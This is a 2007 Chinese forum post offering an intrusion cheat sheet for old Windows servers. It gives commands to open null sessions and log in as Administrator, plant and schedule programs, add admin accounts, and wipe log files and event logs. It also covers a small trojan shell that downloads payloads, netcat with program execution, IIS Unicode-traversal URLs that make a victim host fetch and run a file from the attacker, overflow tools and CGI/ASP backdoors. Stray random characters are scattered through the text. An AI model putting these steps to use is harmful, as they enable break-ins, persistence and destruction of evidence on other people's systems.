找回密码
 入住遨海湾
搜索
网站解决方案专享优惠-3折上云
查看: 727|回复: 0

网管和黑客都必须知道的命令

[复制链接]
发表于 2007-12-22 22:40:00 | 显示全部楼层 |阅读模式

登录后查才能浏览下载更多咨询,有问题联系QQ:3283999

您需要 登录 才可以下载或查看,没有账号?入住遨海湾

×
  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" $ u1 J) m2 l2 y. t4 s  以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" 9 n" U% l5 f- W3 p5 x( }  传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ 1 F6 {+ S% t b2 Z) ^ G0 \   查看远程主机时间 net time \IP地址 0 ?# x5 S2 g3 o+ C% C w4 Q! T  定时启动某个程序 at \IP地址 02:18 readme.exe 9 Q: v' C' [% j8 L. M, @) c  查看共享 net view \IP地址 9 c4 C! ?% o0 J  查看netbios工作组列表 nBTstat -A IP地址 7 J/ D8 j: N6 F9 o2 Z4 L  将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" # l, w+ C3 n' v' D6 m: F$ ]  这两条把自己增加到管理员组: net user 用户名 密码 /add 3 |7 T* y: o P% d& R   net locaLGroup Administrators 用户名 /add # _8 n) S: F* o  断开连接 net use \IP地址ipc$ /delete 6 [7 r9 A) L' d/ |; g" I8 ~; D$ ^+ z2 J+ _0 P$ J, t& Y   扫尾: - _4 r% A) A- t, O  del C:winntsystem32logfiles*.* 3 f2 q' D1 F% y7 L: v v  del C:winntssytem32config*.evt - _0 r( u N$ @# X$ {; A   del C:winntsystem32dTCLog*.* 6 C7 t2 J0 N$ m5 Z( T   del C:winntsystem32*.log " J! P6 V1 H* j   del C:winntsystem32*.txt : t3 j/ j& |# Q& V   del C:winnt*.txt # a0 c; H& _8 _3 K+ _! w6 q  del C:winnt*.log & z: a$ @8 T1 e2 O! L - B# c- v& R& W9 u1 k* ~1 x一、netsvc.exe , i. Q7 ^& i* f8 A$ M% Q  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: 7 A+ q' ]) B% e8 N8 Z- C4 u% t; `  netsvc /list \IP地址 ) u$ Q6 r/ Y6 Y) }3 G  netsvc schedule \IP地址 /query 1 X# a: l5 k2 Z4 @- I3 v   netsvc \IP地址 schedule /start 1 V) _) l+ |; G L8 t4 ~8 l( A ' }( ~" f( C6 E2 \4 ^7 [" J二、OpenTelnet.exe : k4 p, O m/ b, _- g c: ^4 h  远程启动主机的Telnet服务,并绑定端口到7878,例如: 2 W# G; w8 ^1 {. w9 P   OpenTelnet \IP地址 用户名 密码 1 7878 % S4 e" z3 H4 p+ V' k' y& ]   然后就可以telnet到主机的7878端口,进入DOS方式下: . J: z4 U2 ?% T E. z  telnet IP地址 7878 8 |5 E/ u5 g- ^7 \+ u, K0 L/ v% ^6 p4 j& H/ d( q0 [ 三、winshell.exe 3 Q8 k7 B7 r, q6 ?" d  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: ( j2 {# R+ g# O. N& y" e4 T   p Path (查看winshell主程序的路径信息) * M, n* @5 b2 ^0 ]- [   b reBoot (重新启动机器) 0 B3 Q9 F$ s3 N2 y" B0 ]' g  d shutDown (关闭机器) - x8 g. w: l/ f7 t6 i& D   s Shell (执行后你就会看到可爱的“C:>”) . z% n2 x& V- p7 {   x eXit (退出本次登录会话,此命令并不终止winshell的运行) y& D/ Z# X9 m: k8 m) t( O6 A  CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 8 \8 z: d; z. o) v * s$ l, C. l) g. O4 o1 `四、3389登陆器,GUI方式登录远程主机的 ' h; N4 [8 B( M7 t4 p, n) l4 k# a9 {- i7 _2 I: a- V" \ 五、elsave.exe ; e4 T+ F' o* R1 p2 f. O- ^8 l   事件日志清除工具 , ?6 t/ x& ?& g( Q# h5 z   elsave -s \IP地址 -l "application" -C 9 w5 ]4 t1 `; W9 f! ?% q: ~   elsave -s \IP地址 -l "system" -C % T4 |) T* ~' K5 i+ f& `2 O6 J   elsave -s \IP地址 -l "security" -C 8 {. p3 m! x* v9 M2 }   执行后成功清除应用程序日志,系统日志,安全日志 8 D) h" A/ h. P: w/ J- O# G. f六、hbulot.exe 2 y# U4 a. v! ]; u; R   开启win2kserver和winxp的3389服务 7 G7 {9 Z, R: k7 F) E Y  hbulot (/r) ; l I, Y) p& ~# F) S# T* w 5 I' s; O9 q3 u七、nc.exe(netcat.exe) ' ^6 x5 c) v; }3 d* }) |4 p   一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 ( |+ h) S9 @$ Z2 L) p  想要连接到某处: nc (-options) hostname port(s)(ports) ... - B) ]' {2 O/ i1 F  绑定端口等待连接: nc -l -p port (-options) (hostname) (port) # S; A R+ ]. q! r% T6 ^# H& }$ E& R 参数: 8 ]$ w4 Y& E" y0 g; t- M' O, S  -e prog 程序重定向,一旦连接,就执行 (危险!) ; }8 c4 \+ n2 S$ ?- A E( t   -g gateway source-routing hop point(s), up to 8 8 A# I! N( W9 a   -G num source-routing pointer: 4, 8, 12, ... - d9 V+ R# z" l  -h 帮助信息 7 p& S7 j$ q& c' }0 ?8 ]# W   -i secs 延时的间隔 Y% \, V" S. E4 z) ~! L  -l 监听模式,用于入站连接 5 }; Y3 W+ Y: h1 V+ v   -n 指定数字的IP地址,不能用hostname + G# h9 N# m) Y( u3 ]; R  -o file 记录16进制的传输 ) ^) y4 S3 |7 ?( |7 \  -p port 本地端口号 8 q: `* @* h: }; d' `9 I  -r 任意指定本地及远程端口 4 w7 [" J/ `8 z) k, ^  -s addr 本地源地址 5 f, F; d5 ]: S8 Y   -u UDP模式 J) L0 e6 {) [8 G9 q1 v  -v 详细输出——用两个-v可得到更详细的内容 2 |+ D8 q; Q4 m7 c   -w secs timeout的时间 4 p: O; @4 w1 o3 G* Q  -z 将输入输出关掉——用于扫描时 " ]( l. n$ W8 [7 q8 d' V9 _ 7 Y( F F& ^ S* e5 {6 `( n5 r八、TFTPD32.EXE 7 N. G$ ?/ F% A" P" B  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: 5 `3 k+ `+ V+ I. g n/ o0 D5 M& w9 Z# N/ z  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 , Y1 l0 L( p! O0 R. }% g  然后可以直接令文件运行: 6 P% B+ I+ r7 p# @/ P- e9 Y   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 ) M0 H8 ^$ [; {7 M/ |1 d* @) T- L* m& w F 九、prihack.exe是IIS的printer远程缓冲区溢出工具; a" D r1 C: |( w   idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 * ^% H0 h8 z0 A+ h* R5 Z+ d7 ]* i& d) g 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
遨海湾-心灵的港湾 www.aosea.com
您需要登录后才可以回帖 登录 | 入住遨海湾

本版积分规则

网站解决方案专享优惠-3折上云

QQ|手机版|小黑屋|遨海湾超级社区

GMT+8, 2025-5-15 07:18

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表